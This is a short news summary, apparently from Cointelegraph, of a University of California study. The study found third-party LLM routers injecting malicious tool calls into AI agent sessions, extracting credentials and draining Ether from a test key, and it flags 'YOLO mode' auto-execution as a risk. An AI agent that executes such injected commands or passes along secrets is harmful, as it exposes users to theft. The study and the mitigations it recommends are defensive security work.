Security Risks of AI Routers: New Study Reveals Vulnerabilities in Crypto Transactions
Researchers discover malicious AI agent routers that can steal crypto
Cointelegraph
Image: Cointelegraph
Researchers from the University of California have identified security vulnerabilities in third-party AI large language model (LLM) routers that can lead to cryptocurrency theft. Their study uncovered multiple attack vectors, including code injection and credential extraction, posing significant risks for developers using AI tools for crypto-related tasks.
- 01Researchers found vulnerabilities in 26 AI LLM routers that can inject malicious code and steal credentials.
- 02Nine routers were actively injecting malicious code, with one draining Ether from a private key.
- 03The study highlights the risks of using unverified third-party routers for sensitive transactions.
- 04A feature called 'YOLO mode' allows AI agents to execute commands without user confirmation, increasing security risks.
- 05Developers are advised to enhance client-side defenses and avoid transmitting sensitive information through AI agent sessions.
Advertisement
In-Article Ad
A recent study by researchers at the University of California has revealed alarming security vulnerabilities in third-party AI large language model (LLM) routers, which can facilitate cryptocurrency theft. The paper published on Thursday outlines four main attack vectors, including malicious code injection and the extraction of credentials. Co-author Chaofan Shou noted that 26 LLM routers were found to be secretly injecting malicious tool calls and stealing credentials. The research involved testing 28 paid routers and 400 free routers, revealing that nine routers were actively injecting malicious code and one drained Ether (ETH) from a researcher-owned private key. The researchers emphasized the difficulty in detecting malicious routers, as they read secrets in plaintext during normal operations. They also identified a concerning feature known as 'YOLO mode' in many AI frameworks, which allows agents to execute commands without user confirmation, potentially weaponizing previously legitimate routers. To mitigate these risks, developers are recommended to enhance client-side defenses and avoid passing sensitive information through AI agent sessions. The long-term solution proposed involves AI companies cryptographically signing their responses to ensure the integrity of the commands executed by agents.
Advertisement
In-Article Ad
The findings highlight significant risks for developers working with AI tools in cryptocurrency, potentially leading to financial losses.
Advertisement
In-Article Ad
Reader Poll
How concerned are you about the security of AI tools in cryptocurrency transactions?
Connecting to poll...
More about University of California
Read the original article
Visit the source for the complete story.




